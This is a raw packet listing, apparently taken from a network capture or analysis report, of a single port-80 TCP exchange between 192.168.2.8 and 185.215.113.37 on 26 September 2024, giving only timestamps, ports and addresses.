Sep 26, 2024 02:40:09.151963949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.151978016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.151979923 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.152000904 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.152019024 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.152153015 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.152194977 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.152215958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.152231932 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.152256012 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.152276993 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.152297020 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.152335882 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.155127048 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.159841061 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.382210016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.382344007 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.400051117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.400118113 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:09.404827118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.404892921 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.404958963 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.404973030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.404989958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.405230045 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.255348921 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.255448103 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.256876945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.256933928 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.259038925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.259105921 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.262213945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.262284994 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.512231112 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.516988993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737643957 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737679958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737694025 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737704992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737710953 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.737718105 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737751961 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.737751961 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.737771034 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.737917900 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737967014 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.737974882 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.737988949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.738018036 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.738050938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.738075018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.738097906 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.738121033 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.738797903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.738847017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.738869905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.738912106 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.866621971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.866638899 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.866651058 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.866734982 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.866780996 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.866904020 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.866918087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.866930008 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.866950989 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.866971016 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.867130041 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.867155075 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.867161989 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.867178917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.867206097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.867584944 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.867598057 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.867610931 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.867621899 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.867625952 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.867645025 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.867671967 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.868107080 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.868119001 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.868130922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.868151903 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.868154049 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.868175983 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.868184090 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.868197918 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.868221998 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.868974924 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.869019032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.869030952 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.869041920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.869056940 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.869062901 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.869070053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.869095087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.869119883 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.869813919 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.869865894 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.957165956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.957181931 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.957307100 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.995851994 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.995984077 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.995991945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996006012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996021032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996032953 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996059895 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996108055 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996241093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996253014 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996270895 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996283054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996284962 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996296883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996310949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996310949 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996325016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996357918 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996376038 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996522903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996565104 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996565104 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996577978 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996599913 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996628046 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996659040 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996671915 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996684074 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996690989 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.996695995 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.996771097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.997266054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997287989 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997301102 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997361898 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.997406960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.997440100 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997452021 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997529984 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.997639894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997653008 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997663021 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.997701883 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.997761011 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.998136044 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.998188019 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.998189926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.998203993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.998226881 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.998239994 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.998260975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.998274088 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.998286963 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.998296022 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.998301029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.998313904 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.998327017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.998344898 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999027014 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999047041 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999059916 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999073029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999083042 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999093056 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999103069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999103069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999109030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999114990 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999124050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999131918 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999141932 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999166965 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999773026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999819994 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999821901 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999836922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999872923 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999901056 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999936104 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999949932 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:11.999952078 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999952078 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:11.999984026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.124682903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.124697924 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.124759912 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.124836922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.124850988 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.124877930 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.124892950 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.124897957 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.124946117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.124982119 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.124994993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125008106 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125022888 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125022888 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125040054 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125081062 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125082016 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125216961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125262022 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125272989 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125274897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125319958 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125319958 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125346899 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125360012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125386953 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125399113 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125579119 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125591040 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125612020 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125623941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125633001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125638008 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125648022 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125652075 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125659943 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125680923 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125684023 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125699043 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125718117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125936031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.125984907 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.125993967 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126029015 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126147032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126158953 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126171112 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126204967 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126204967 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126231909 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126245022 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126256943 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126264095 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126272917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126303911 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126497030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126543999 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126557112 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126569986 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126601934 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126622915 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126652956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126666069 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126672029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126710892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126734018 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126758099 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126770020 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126781940 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126795053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126801014 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126807928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126815081 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126823902 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126842976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126880884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.126899958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.126945019 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127321959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127371073 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127393007 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127407074 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127439022 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127441883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127449989 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127454996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127484083 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127507925 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127566099 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127578974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127592087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127604961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127614975 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127619028 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127628088 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127656937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127657890 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127671003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.127693892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.127717972 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129611969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129633904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129647017 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129661083 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129679918 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129698992 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129707098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129719019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129743099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129755974 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129812002 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129848957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129884005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129916906 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129944086 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129957914 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129970074 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.129981041 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.129981995 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130007982 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130040884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130074978 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130088091 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130099058 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130110979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130119085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130119085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130125046 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130141973 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130157948 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130163908 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130176067 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130201101 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130223989 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130546093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130568027 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130578995 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130594015 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130608082 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130614996 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130641937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130652905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130676031 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130688906 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:12.130855083 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130886078 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130897999 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:12.130898952 CEST	49705	80	192.168.2.8	185.215.113.37
